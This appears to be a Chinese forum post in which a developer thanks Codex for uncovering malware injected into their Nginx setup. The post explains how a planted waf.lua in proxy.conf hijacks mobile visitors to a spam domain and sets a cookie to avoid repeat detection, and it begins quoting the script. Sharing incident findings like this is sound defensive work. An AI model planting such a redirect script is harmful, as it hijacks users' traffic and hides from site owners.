Lizer (@Loverz55) 在感谢codex解决了nginx被人植入病毒，nginx的安全性真的让人担忧中发帖我们的业务主要是web + 软件，没有怎么管移动端，导致这次nginx被植入了病毒都不知道，具体的病毒就是访问网站移动端检测是苹果手机或者安卓手机就劫持然后跳垃圾网站 codex解析出来的移动端请求进入网站的 NginxNginx 全局 proxy.conf 里被插入了waf.luawaf.lua 读取 User-Agent，如果是 Android/iPhone，就随机跳转到：https://随机子域.histats.cfd/news.html 4.它还会设置： Set-Cookie: k=260528;Path=/;Max-Age=43200 意思是“当天已经劫持过一次”，后续可能放行，降低被发现概率

Lizer (@Loverz55) 在感谢codex解决了nginx被人植入病毒，nginx的安全性真的让人担忧中发帖

我们的业务主要是web + 软件，没有怎么管移动端，导致这次nginx被植入了病毒都不知道， 
具体的病毒就是访问网站移动端检测是苹果手机或者安卓手机就劫持然后跳垃圾网站 
codex解析出来的 

移动端请求进入网站的 Nginx
Nginx 全局 proxy.conf 里被插入了waf.lua
waf.lua 读取 User-Agent，如果是 Android/iPhone，就随机跳转到：https://随机子域.histats.cfd/news.html 
4.它还会设置： 
Set-Cookie: k=260528;Path=/;Max-Age=43200 
意思是“当天已经劫持过一次”，后续可能放行，降低被发现概率。

附上被植入的脚本 
local U = ngx.var.http_user_agent or “” 
local K = ngx.var.http_cookie ...